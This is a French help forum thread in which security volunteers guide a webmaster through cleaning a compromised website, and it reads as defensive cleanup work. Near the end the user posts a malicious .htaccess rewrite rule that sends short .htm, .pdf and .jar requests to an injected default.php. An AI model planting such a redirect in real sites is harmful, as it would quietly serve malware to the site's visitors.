jusqu'à présent je pouvais te comprendre avec mes compétences limitées, mais ce que tu me demandes là je ne sais pas comment faire?
comment avoir accès aux écritures du fichier ? comment repérer la ligne 64 pour l'effacer?
Messages postés
35446
Date d'inscription
jeudi 18 décembre 2008
Statut
Contributeur sécurité
Dernière intervention
5 mai 2017
4 765
ouvre le fichier .php avec clic droit -> modifier
ou mieux télécharge notepad++ et modifie le fichier avec notepad++
tu verras une ligne avec "base64", tu la vire.
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015
>
Messages postés
35446
Date d'inscription
jeudi 18 décembre 2008
Statut
Contributeur sécurité
Dernière intervention
5 mai 2017

merci juju,
je fais en suivant
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
Toutes les détections dans les fichiers de sauvegarde default.php etc
il faut les supprimer s'ils sont en ligne.
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

tout est supprimé
pour la ligne64 à supprimer dans contactpage:



est ce la seule ligne 15 à supprimer?
ou est ce les lignes 14+15+16 à supprimer?
Messages postés
35446
Date d'inscription
jeudi 18 décembre 2008
Statut
Contributeur sécurité
Dernière intervention
5 mai 2017
4 765
14 et 16 sont des commentaires (#) qui "balisent" le code malveillant. tu peux les supprimer oui :)
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

tous les fichiers infectés ont été supprimés
la ligne base64 de contactpage a été supprimée
le site est mis à jour
la machine rebooté.
mais sur IE tout comme firefox j'ai toujours le même blocage d'avast?
Messages postés
35446
Date d'inscription
jeudi 18 décembre 2008
Statut
Contributeur sécurité
Dernière intervention
5 mai 2017
4 765
Il est sous quel OS ton serveur, un Linux ?
Si tu peux installer des trucs dessus, essaie ClamAV : http://www.clamav.net/
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

clamAV permet-il de nettoyer un réseau sous windows serveur 2003 R2?
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

windows serveur 2003 R2
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
Faudrait scanner le serveur avec un antivirus, parce que là on a vérifié que ton poste à priori.
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

1. que penses tu malekal sur l'idée de scanner le serveur avec clamav comme le suggère juju ?

2. puisque avast réagit toujours, c'est que certains fichiers sont encore infectés? dans ce cas faudrait il les passer en revue un après l'autre comme le suggère juju? le problème c'est que :

A j'ai 997 fichiers sur le site! faut il tous les contrôler? peut on hiérarchiser ce travail pour le rendre moins chronophage ? il y a t'il des indices qui nous permettraient de ne traiter qu'une partie comme par ex: ne contrôler que les fichiers avec une extension spécifique? ne pas traiter les autres car inutile? ne traiter que les fichiers dans certaines rubriques etc...
B comment identifier les codes malveillants dans les lignes des fichiers? est ce toujours celles contenant "ligne64"?
C si j'entreprends cet énorme travail, suis je sur à l'arrivée d'obtenir enfin une réparation du site?
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
Supprime le fichier .htaccess et default.php
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015
>
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020

htaccess se trouve dans deux endroits du site. je viens de le supprimer dans les deux.
j'avais déjà supprimé default.php

après test du site : même réaction de blocage d'avast:
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
La détection URL:MAL
Vu que le site doit avoir des malwares depuis 2012, il doit être présent dans leurs blacklists.

Contact les pour leur demande s'il y a une blacklist et de la retirer en disant que tu as nettoyer le site.

Tu peux le faire sur le forum : https://forum.avast.com/index.php?board=23.0
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015
>
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020

Je viens d'envoyer le message à avast, je te tiens informé
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015

bonsoir,
voici en retour les analyses d'avast, suite à ma demande de sortir notre site de la blackliste compte tenu de son nettoyage complet et récent:


http://zulu.zscaler.com/submission/show/5ed7d1ec0fbf8def473fa28104b776b4-1421778070
https://www.virustotal.com/gui/url/b0c255484fa682ed96919ce0c80686eb8a299cda04cae6a434d2868166081753
https://www.urlvoid.com/scan/l-eau.eu/

http://www.scumware.org/search.scumware
IFrame trojans

http://urlquery.net/report.php?id=1421778277330
https://sitecheck.sucuri.net/results/l-eau.eu
http://www.scamvoid.com/check/l-eau.eu
http://urlquery.net/report.php?id=1421778618153
https://www.ssllabs.com/ssltest/analyze.html?d=l-eau.eu
https://dnscheck.pingdom.com/?domain=l-eau.eu
http://multirbl.valli.org/lookup/91.216.107.195.html
https://quttera.com/detailed_report/l-eau.eu

que faut il en conclure? comment y répondre?
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015
>
Messages postés
35446
Date d'inscription
jeudi 18 décembre 2008
Statut
Contributeur sécurité
Dernière intervention
5 mai 2017

c'est indispensable?
le problème c'est qu'il est infecté! comment le récupérer et le rendre sain?
merci
Messages postés
35446
Date d'inscription
jeudi 18 décembre 2008
Statut
Contributeur sécurité
Dernière intervention
5 mai 2017
4 765
poste son contenu.
Messages postés
39
Date d'inscription
lundi 12 janvier 2015
Statut
Membre
Dernière intervention
2 février 2015
>
Messages postés
35446
Date d'inscription
jeudi 18 décembre 2008
Statut
Contributeur sécurité
Dernière intervention
5 mai 2017

contenu de htaccess:

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^[a-z0-9]{1,4}[.](htm|pdf|jar) default.php [L]
</IfModule>
Messages postés
35446
Date d'inscription
jeudi 18 décembre 2008
Statut
Contributeur sécurité
Dernière intervention
5 mai 2017
4 765
Ouais, c'est une simple redirection mais néfaste en effet.

Faudrait voir s'il a été écrasé ou s'il était vierge à l'origine.
Messages postés
180267
Date d'inscription
mercredi 17 mai 2006
Statut
Modérateur, Contributeur sécurité
Dernière intervention
15 décembre 2020
23 102
si default.php a été supprimé, ça ne doit plus fonctionner.
Par contre les antivirus doivent le flagguer.

Tu es censé avoir supprimer les .htaccess